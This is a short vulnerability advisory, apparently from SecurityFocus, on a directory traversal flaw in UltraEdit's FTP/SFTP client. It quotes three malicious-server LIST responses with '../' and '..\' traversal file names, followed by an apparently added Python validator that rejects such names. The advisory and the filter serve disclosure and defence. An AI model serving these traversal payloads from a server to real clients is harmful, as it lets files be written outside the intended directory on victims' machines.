
UltraEdit FTP/SFTP 'LIST' Command Directory Traversal Vulnerability

An attacker can exploit this issue by enticing an unsuspecting victim to connect to a malicious server.

The following proofs of concept are available:

Response to LIST (backslash):

\..\..\..\..\..\..\..\..\..\testfile.txt\r\n

Response to LIST (forward-slash):

/../../../../../../../../../testfile.txt\r\n

Response to LIST (backslash and forward-slash):

../..\/..\/..\/../..\/../..\/../testfile.txt\r\n
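A client-side check for the three LIST responses above, as an added example that is not from the advisory or from UltraEdit's code: it treats each file name in a listing as untrusted and accepts it only if it is a bare name that resolves inside the chosen download directory. The helper names and the `downloads` directory are assumptions, and `report.txt` is a constructed benign entry.

```python
import os

# Added example with hypothetical helper names. "/" and "\" both count as
# separators on any host OS, because the responses above mix the two styles.
SEPARATORS = ("/", "\\")

class UnsafeListingName(ValueError):
    """A server-supplied file name that could escape the download directory."""

def safe_local_path(download_dir, listed_name):
    """Map one file name from a LIST response to a path inside download_dir."""
    name = listed_name.rstrip("\r\n")
    if not name or name in (".", ".."):
        raise UnsafeListingName(f"empty or dot name: {listed_name!r}")
    if any(sep in name for sep in SEPARATORS):
        raise UnsafeListingName(f"path separator in name: {listed_name!r}")
    if ":" in name or "\x00" in name:
        raise UnsafeListingName(f"drive, stream or NUL character: {listed_name!r}")
    base = os.path.realpath(download_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # Defence in depth: the resolved path must still sit under the base directory.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeListingName(f"resolves outside download dir: {listed_name!r}")
    return candidate

def check_listing(download_dir, names):
    """Return (accepted_paths, rejected_names) for a batch of listing entries."""
    accepted, rejected = [], []
    for n in names:
        try:
            accepted.append(safe_local_path(download_dir, n))
        except UnsafeListingName:
            rejected.append(n)
    return accepted, rejected

# The three responses quoted above, plus one constructed benign entry.
SAMPLE_NAMES = [
    "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\testfile.txt\r\n",
    "/../../../../../../../../../testfile.txt\r\n",
    "../..\\/..\\/..\\/../..\\/../..\\/../testfile.txt\r\n",
    "report.txt\r\n",
]

if __name__ == "__main__":
    ok, bad = check_listing("downloads", SAMPLE_NAMES)
    print("accepted:", ok, "rejected:", bad)
```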







 

Copyright 2009, SecurityFocus